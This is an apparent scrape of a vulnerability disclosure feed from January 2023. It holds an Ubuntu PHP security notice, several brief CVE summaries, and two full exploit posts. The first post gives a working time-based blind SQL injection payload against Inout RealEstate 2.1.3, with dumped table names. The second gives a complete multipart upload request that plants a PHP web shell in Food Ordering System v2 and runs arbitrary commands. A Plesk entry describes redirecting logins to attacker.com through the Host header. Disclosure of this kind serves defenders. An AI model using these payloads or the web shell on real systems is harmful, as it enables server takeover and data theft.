Ubuntu Security Notice 5818-1 - It was discovered that PHP incorrectly handled certain inputs. An attacker could possibly use this issue to cause a crash or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5818-1  
January 23, 2023

php7.2, php7.4, php8.1 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

PHP could be made do crash or execute arbitrary code if it received  
a specially crafted input.

Software Description:  
- php8.1: HTML-embedded scripting language interpreter  
- php7.4: HTML-embedded scripting language interpreter  
- php7.2: HTML-embedded scripting language interpreter

Details:

It was discovered that PHP incorrectly handled certain inputs.  
An attacker could possibly use this issue to cause a crash or  
execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
  libapache2-mod-php7.4           8.1.7-1ubuntu3.2  
  libapache2-mod-php8.0           8.1.7-1ubuntu3.2  
  libapache2-mod-php8.1           8.1.7-1ubuntu3.2  
  php8.1                          8.1.7-1ubuntu3.2  
  php8.1-cgi                      8.1.7-1ubuntu3.2  
  php8.1-cli                      8.1.7-1ubuntu3.2  
  php8.1-sqlite3                  8.1.7-1ubuntu3.2

Ubuntu 22.04 LTS:  
  libapache2-mod-php7.4           8.1.2-1ubuntu2.10  
  libapache2-mod-php8.0           8.1.2-1ubuntu2.10  
  libapache2-mod-php8.1           8.1.2-1ubuntu2.10  
  php8.1                          8.1.2-1ubuntu2.10  
  php8.1-cgi                      8.1.2-1ubuntu2.10  
  php8.1-cli                      8.1.2-1ubuntu2.10  
  php8.1-sqlite3                  8.1.2-1ubuntu2.10

Ubuntu 20.04 LTS:  
  libapache2-mod-php7.4           7.4.3-4ubuntu2.17  
  php7.4                          7.4.3-4ubuntu2.17  
  php7.4-cgi                      7.4.3-4ubuntu2.17  
  php7.4-cli                      7.4.3-4ubuntu2.17  
  php7.4-sqlite3                  7.4.3-4ubuntu2.17

Ubuntu 18.04 LTS:  
  libapache2-mod-php7.2           7.2.24-0ubuntu0.18.04.16  
  php7.2                          7.2.24-0ubuntu0.18.04.16  
  php7.2-cgi                      7.2.24-0ubuntu0.18.04.16  
  php7.2-cli                      7.2.24-0ubuntu0.18.04.16  
  php7.2-sqlite3                  7.2.24-0ubuntu0.18.04.16

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5818-1  
  CVE-2022-31631

Package Information:  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.7-1ubuntu3.2  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.10  
  https://launchpad.net/ubuntu/+source/php7.4/7.4.3-4ubuntu2.17  
  https://launchpad.net/ubuntu/+source/php7.2/7.2.24-0ubuntu0.18.04.16

Ubuntu Security Notice USN-5818-1

Inout RealEstate version 2.1.3 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : inoutscripts.com                                                           ││  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        ││  Software : Inout RealEstate 2.1.3                                                     ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpPOST parameter 'lidaray' is vulnerable to SQLIlidaray=[Inject-HERE]---Parameter: lidaray (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: lidaray=' AND (SELECT 9508 FROM (SELECT(SLEEP(5)))BNUc) AND 'IpMJ'='IpMJ---[INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.0.12[INFO] fetching tables for database: '*****_realestate'[INFO] fetching number of tables for database ''*****_realestate'Database: *****_realestate[45 tables]+--------------------------------+| adcode                         || admin_account                  || admin_payment_details          || agent_list_request_to_user     || broker_citymap                 || broker_rate                    || broker_review                  || brokerabusereport              || category_property              || chat_details                   || chat_messages                  || checkout_ipn                   || countries                      || custom_field                   || detail_statistics_list         || email_templates                || enquiry_status                 || forgetpassword                 || inout_ipns                     || invoicegen                     || languages                      || list_brokermap                 || list_images                    || list_main                      || listopenhouse                  || normal_statistics_list         || paymentdetailstat              || popularsearchlist              || ppc_currency                   || public_side_media_detail       || public_slide_images            || recentsearchlist               || settings                       || sold_listing                   || soldlistadd                    || traveller_bank_deposit_history || user_broker_licenses           || user_broker_registration       || user_email_verification        || user_list_agent_request        || user_registration              || user_wishlist_mapping          || userabusereport                || userlistactive                 || wish_list                      |+--------------------------------+[-] Done

Inout RealEstate 2.1.3 SQL Injection

Food Ordering System version 2 suffers from a remote shell upload vulnerability.

## Title: Food Ordering System v2 File upload Vulnerability + web-shell upload - RCE## Author: nu11secur1ty## Date: 01.23.2023## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Food-Ordering-System-v2.0## Description:The Food Ordering System v2 suffers from, File Upload and web-shellupload RCE Vulnerabilities.The upload function for the background image hover of this system isnot sanitizing correctly.The attacker can upload some RCE malicious code and easily destroythis system. The status of this system is awful!## STATUS: HIGH Vulnerability[+] Exploit:```GETPOST /fos/admin/ajax.php?action=save_settings HTTP/1.1Host: pwnedhost.comContent-Length: 6157Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryqYQLHPx3VuntGH7WOrigin: http://pwnedhost.comReferer: http://pwnedhost.com/fos/admin/index.php?page=site_settingsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=598nahp235ehmk2broafrh37qqConnection: close------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="name"Online Food Ordering System V2------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="email"info@sample.com------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="contact"+6948 8542 623------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="about"<p style="text-align: center; background: transparent; position:relative;"><span style="font-size:28px;background: transparent;position: relative;">ABOUT US</span></b></span></p><pstyle="text-align: center; background: transparent; position:relative;"><span style="background: transparent; position: relative;font-size: 14px;"><span style="font-size:28px;background: transparent;position: relative;"><b style="margin: 0px; padding: 0px; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;text-align: justify;">Lorem Ipsum</b><span style="color: rgb(0, 0, 0);font-family: "Open Sans", Arial, sans-serif; font-weight:400; text-align: justify;">&nbsp;is simply dummy text of the printingand typesetting industry. Lorem Ipsum has been the industry&#x2019;sstandard dummy text ever since the 1500s, when an unknown printer tooka galley of type and scrambled it to make a type specimen book. It hassurvived not only five centuries, but also the leap into electronictypesetting, remaining essentially unchanged. It was popularised inthe 1960s with the release of Letraset sheets containing Lorem Ipsumpassages, and more recently with desktop publishing software likeAldus PageMaker including versions of LoremIpsum.</span><br></span></b></span></p><p style="text-align: center;background: transparent; position: relative;"><span style="background:transparent; position: relative; font-size: 14px;"><spanstyle="font-size:28px;background: transparent; position:relative;"><span style="color: rgb(0, 0, 0); font-family: "OpenSans", Arial, sans-serif; font-weight: 400; text-align:justify;"><br></span></b></span></p><p style="text-align: center;background: transparent; position: relative;"><span style="background:transparent; position: relative; font-size: 14px;"><spanstyle="font-size:28px;background: transparent; position:relative;"><h2 style="font-size:28px;background: transparent;position: relative;">Where does it come from?</h2><pstyle="text-align: center; margin-bottom: 15px; padding: 0px; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;font-weight: 400;">Contrary to popular belief, Lorem Ipsum is notsimply random text. It has roots in a piece of classical Latinliterature from 45 BC, making it over 2000 years old. RichardMcClintock, a Latin professor at Hampden-Sydney College in Virginia,looked up one of the more obscure Latin words, consectetur, from aLorem Ipsum passage, and going through the cites of the word inclassical literature, discovered the undoubtable source. Lorem Ipsumcomes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum etMalorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC.This book is a treatise on the theory of ethics, very popular duringthe Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sitamet..", comes from a line in section1.10.32.</p></span></b></span></p>------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="img"; filename="pic.php"Content-Type: image/jpeg<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><html>  <head>    <meta http-equiv="Content-Type" content="text/html" charset="euc-kr">    <title>PHP Web Shell Ver 4.0 by nu11secur1ty</title>    <script type="text/javascript">      function FocusIn(obj)      {        if(obj.value == obj.defaultValue)          obj.value = '';      }            function FocusOut(obj)      {        if(obj.value == '')          obj.value = obj.defaultValue;      }    </script>  </head>  <body>    <b>WebShell's Location = http://<?php echo $_SERVER['HTTP_HOST'];echo $_SERVER['REQUEST_URI'] ?></b><br><br>        HTTP_HOST = <?php echo $_SERVER['HTTP_HOST'] ?><br>    REQUEST_URI = <?php echo $_SERVER['REQUEST_URI'] ?><br>        <br>        <form name="cmd_exec" method="post" action="http://<?php echo$_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>">      <input type="text" name="cmd" size="70" maxlength="500"value="Input command to execute"onfocus="FocusIn(document.cmd_exec.cmd)"onblur="FocusOut(document.cmd_exec.cmd)">      <input type="submit" name="exec" value="exec">    </form>    <?php      if(isset($_POST['exec']))      {        exec($_POST['cmd'],$result);        echo '----------------- < OutPut > -----------------';        echo '<pre>';        foreach($result as $print)        {          $print = str_replace('<','<',$print);          echo $print . '<br>';        }        echo '</pre>';      }      else echo '<br>';    ?>        <form enctype="multipart/form-data" name="file_upload" method="post"action="http://<?php echo $_SERVER['HTTP_HOST']; echo$_SERVER['REQUEST_URI'] ?>">      <input type="file" name="file">      <input type="submit" name="upload" value="upload"><br>      <input type="text" name="target" size="100" value="Location wherefile will be uploaded (include file name!)"onfocus="FocusIn(document.file_upload.target)"onblur="FocusOut(document.file_upload.target)">    </form>    <?php      if(isset($_POST['upload']))      {        $check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']);                if($check == TRUE)          echo '<pre>The file was uploaded successfully!!</pre>';        else          echo '<pre>File Upload was failed...</pre>';      }    ?>  </body></html>------WebKitFormBoundaryqYQLHPx3VuntGH7W--```[+] Response:```HTTPHTTP/1.1 200 OKDate: Mon, 23 Jan 2023 12:27:44 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0X-Powered-By: PHP/8.2.0Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 1Connection: closeContent-Type: text/html; charset=UTF-81```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Food-Ordering-System-v2.0)## Reference:[href](https://portswigger.net/web-security/file-upload)## Proof and Exploit:[href](https://www.youtube.com/watch?v=t7RnRFnXTP4)## Proof and Exploit:[href](https://streamable.com/c026hq)## Time spent`01:00:00`

Food Ordering System 2 Shell Upload

The WP Limit Login Attempts WordPress plugin through 2.6.4 prioritizes getting a visitor's IP from certain HTTP headers over PHP's REMOTE_ADDR, which makes it possible to bypass IP-based restrictions on login forms.

CVE-2022-4303

The WeStand WordPress theme before 2.1, footysquare WordPress theme, aidreform WordPress theme, statfort WordPress theme, club-theme WordPress theme, kingclub-theme WordPress theme, spikes WordPress theme, spikes-black WordPress theme, soundblast WordPress theme, bolster WordPress theme from ChimpStudio and PixFill does not have any authorisation and upload validation in the lang_upload.php file, allowing any unauthenticated attacker to upload arbitrary files to the web server.

CVE-2022-0316

The Analyticator WordPress plugin before 6.5.6 unserializes user input provided via the settings, which could allow high-privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.

CVE-2022-3425

The FluentAuth WordPress plugin before 1.0.2 prioritizes getting a visitor's IP address from certain HTTP headers over PHP's REMOTE_ADDR, which makes it possible to bypass the IP-based blocks set by the plugin.

CVE-2022-4746

app/View/AuthKeys/authkey_display.ctp in MISP through 2.4.167 has an XSS in authkey add via a Referer field.

@@ -12,7 +12,7 @@

<pre class\="quickSelect"\><?= h($entity\['AuthKey'\]\['authkey\_raw'\]) ?></pre\>

</div\>

<div class\="modal-footer"\>

<a href\="<?= $referer ?>" class\="btn btn-primary"\><?= \_\_('I have noted down my key, take me back now') ?></a\>

<a href\="<?= h($referer) ?>" class\="btn btn-primary"\><?= \_\_('I have noted down my key, take me back now') ?></a\>

</div\>

</div\>

<?php

@@ -22,7 +22,7 @@

<p\><?= \_\_('Please make sure that you note down the auth key below, this is the only time the auth key is shown in plain text, so make sure you save it. If you lose the key, simply remove the entry and generate a new one.'); ?></p\>

<p\><?=\_\_('MISP will use the first and the last 4 characters for identification purposes.')?></p\>

<pre class\="quickSelect"\><?= h($entity\['AuthKey'\]\['authkey\_raw'\]) ?></pre\>

<a href\="<?= $referer ?>" class\="btn btn-primary"\><?= \_\_('I have noted down my key, take me back now') ?></a\>

<a href\="<?= h($referer) ?>" class\="btn btn-primary"\><?= \_\_('I have noted down my key, take me back now') ?></a\>

<?php

}

?>

CVE-2023-24070: fix: [security] XSS in authkey add · MISP/MISP@f7238fe

Booked Scheduler 2.5.5 allows authenticated users to create and schedule events for any other user via a modified userId value to reservation_save.php. NOTE: 2.5.5 is a version from 2014.

Permalink

Cannot retrieve contributors at this time

<?php

/\*\*

Copyright 2011-2016 Nick Korbel

This file is part of Booked Scheduler.

Booked Scheduler is free software: you can redistribute it and/or modify

it under the terms of the GNU General Public License as published by

the Free Software Foundation, either version 3 of the License, or

(at your option) any later version.

Booked Scheduler is distributed in the hope that it will be useful,

but WITHOUT ANY WARRANTY; without even the implied warranty of

MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

GNU General Public License for more details.

You should have received a copy of the GNU General Public License

along with Booked Scheduler. If not, see <http://www.gnu.org/licenses/>.

\*/

define('ROOT\_DIR', '../../');

require\_once(ROOT\_DIR . 'Pages/Ajax/ReservationSavePage.php');

$page = new ReservationSavePage();

$page\->PageLoad();

CVE-2023-24058: app/reservation_save.php at 0a6cb1a9eb84835553c8caf93db2791f8655140f · LibreBooking/app

A Host Header Injection issue on the Login page of Plesk Obsidian through 18.0.49 allows attackers to redirect users to malicious websites via a Host request header.

**Description:** A Host Header Injection issue on the Login page of Plesk Obsidian through 18.0.49 allows attackers to redirect users to malicious websites via a HTTP “Host” request header.

**Vulnerability:** Host Header Injection

**Product:** Plesk Obsidian

**Version:** 18.0.49 and below

**Tools:**

1.  Burp Suite
2.  Mozilla Firefox (as a browser)

**Scenario:** Attacker could redirect users login page to malicious login page by inject a payload directly into the “Host: ” HTTP request header.

**Steps:**

1.  Access the target website (which Plesk installed) without URL path. In this case -> https://localhost:8443/.

2\. Intercept “https://localhost:8443/login.php” request and Modify the “Host: ” HTTP request header value to malicious website. In this case -> attacker.com and then forward the edited request.

3\. The target website will redirect to “https://attacker.com/login\_up.php” instead of “https://localhost:8443/login.php”.

**PoC:**

1.  Provided screenshot below

2\. Video attached

Tag

#php